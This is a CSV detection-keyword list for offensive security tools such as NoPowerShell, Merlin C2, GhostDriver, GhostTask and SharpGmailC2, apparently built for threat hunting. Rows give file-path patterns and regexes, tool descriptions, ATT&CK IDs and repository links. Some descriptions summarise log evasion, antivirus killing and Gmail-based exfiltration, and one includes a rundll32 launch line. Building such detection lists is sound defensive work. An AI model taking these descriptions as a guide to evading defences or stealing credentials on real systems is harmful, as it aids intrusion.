"*\GetHelpCommand.cs",".{0,1000}\\GetHelpCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetHotFixCommand.cs",".{0,1000}\\GetHotFixCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-InfectedThread.ps1*",".{0,1000}\\Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-InjectedThread.ps1*",".{0,1000}\\Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\GetItemPropertyCommand.cs",".{0,1000}\\GetItemPropertyCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetItemPropertyValueCommand.cs",".{0,1000}\\GetItemPropertyValueCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalGroupCommand.cs",".{0,1000}\\GetLocalGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalGroupMemberCommand.cs",".{0,1000}\\GetLocalGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalUserCommand.cs",".{0,1000}\\GetLocalUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetIPAddressCommand.cs",".{0,1000}\\GetNetIPAddressCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetNeighborCommand.cs",".{0,1000}\\GetNetNeighborCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetRouteCommand.cs",".{0,1000}\\GetNetRouteCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetTCPConnectionCommand.cs",".{0,1000}\\GetNetTCPConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Get-OSTokenInformation.ps1*",".{0,1000}\\Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-PassHints.ps1*",".{0,1000}\\Get\-PassHints\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\GetPasswords.ps1*",".{0,1000}\\GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetProcessCommand.cs",".{0,1000}\\GetProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetProcHandleDrv_x64.sys*",".{0,1000}\\GetProcHandleDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetPSDriveCommand.cs",".{0,1000}\\GetPSDriveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetRemoteSmbShareCommand.cs",".{0,1000}\\GetRemoteSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-ScheduledTaskComHandler.ps1*",".{0,1000}\\Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\GetSmbMappingCommand.cs",".{0,1000}\\GetSmbMappingCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetSmbShareCommand.cs",".{0,1000}\\GetSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-SpoolStatus.ps1*",".{0,1000}\\Get\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\Get-TGSCipher.ps1*",".{0,1000}\\Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-UnConstrained.ps1*",".{0,1000}\\Get\-UnConstrained\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\GetWebDAVStatus\",".{0,1000}\\GetWebDAVStatus\\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\GetWebDAVStatus_x64*",".{0,1000}\\GetWebDAVStatus_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\GetWhoamiCommand.cs",".{0,1000}\\GetWhoamiCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetWinStationCommand.cs",".{0,1000}\\GetWinStationCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetWmiObjectCommand.cs",".{0,1000}\\GetWmiObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\gfscgsvs.log*",".{0,1000}\\gfscgsvs\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ghauri\ghauri\*",".{0,1000}\\ghauri\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\ghauri-1*\ghauri\*",".{0,1000}\\ghauri\-1.{0,1000}\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\GhostDriver.exe*",".{0,1000}\\GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\ghostdriver.sys*",".{0,1000}\\ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\GhostDriver-main\*",".{0,1000}\\GhostDriver\-main\\.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\GhostMapper.sln*",".{0,1000}\\GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*\GhostTask.h*",".{0,1000}\\GhostTask\.h.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask\*",".{0,1000}\\GhostTask\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask-1.0\*",".{0,1000}\\GhostTask\-1\.0\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask-main*",".{0,1000}\\GhostTask\-main.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\glit.exe*",".{0,1000}\\glit\.exe.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*\glit-cli*",".{0,1000}\\glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*\gmailC2.exe*",".{0,1000}\\gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 